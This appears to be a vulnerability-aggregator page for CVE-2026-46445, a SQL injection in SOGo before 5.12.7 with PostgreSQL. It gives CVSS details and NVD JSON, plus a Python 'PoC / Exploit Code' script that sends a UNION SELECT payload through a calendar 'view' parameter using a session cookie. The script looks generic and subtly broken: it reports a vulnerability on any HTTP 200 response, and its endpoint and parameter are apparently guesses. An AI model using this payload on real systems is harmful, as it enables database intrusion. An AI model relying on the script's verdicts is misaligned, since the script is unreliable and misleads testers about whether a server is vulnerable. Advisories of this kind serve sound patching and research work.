Security Vulnerability Report
中文
CVE-2026-46445 CVSS 7.1 HIGH

CVE-2026-46445

Published: 2026-05-14 04:17:03
Last Modified: 2026-05-14 16:49:19

Description

SOGo before 5.12.7, when PostgreSQL is used, allows SQL injection.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

SOGo < 5.12.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL example url = "http://target-sogo-server/SOGo/so/user/Calendar/view" # Payload to test for PostgreSQL SQL Injection # This attempts to append a query that checks the database version payload = "1' UNION SELECT NULL, version(), NULL-- -" # Headers simulating a low-privilege authenticated user session headers = { "User-Agent": "Mozilla/5.0", "Cookie": "SOGoSID=valid_session_id_here;" } # Send the malicious request try: response = requests.get(url, params={'view': payload}, headers=headers, timeout=10) # Analyze response if "PostgreSQL" in response.text or response.status_code == 200: print("[+] Potential SQL Injection vulnerability detected!") print("[+] Response snippet:", response.text[:200]) else: print("[-] Exploit failed or target is patched.") except Exception as e: print(f"[!] Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-46445", "sourceIdentifier": "[email protected]", "published": "2026-05-14T04:17:03.193", "lastModified": "2026-05-14T16:49:18.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOGo before 5.12.7, when PostgreSQL is used, allows SQL injection."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/Alinto/sogo/pull/379/changes/1f7e5d2b2c2047c44a6a9e05f73c36491cb96d21", "source": "[email protected]"}, {"url": "https://www.mail-archive.com/debian-bugs-dist%40lists.debian.org/msg2100131.html", "source": "[email protected]"}, {"url": "https://www.sogo.nu/news/2026/sogo-v5127-released.html", "source": "[email protected]"}]}}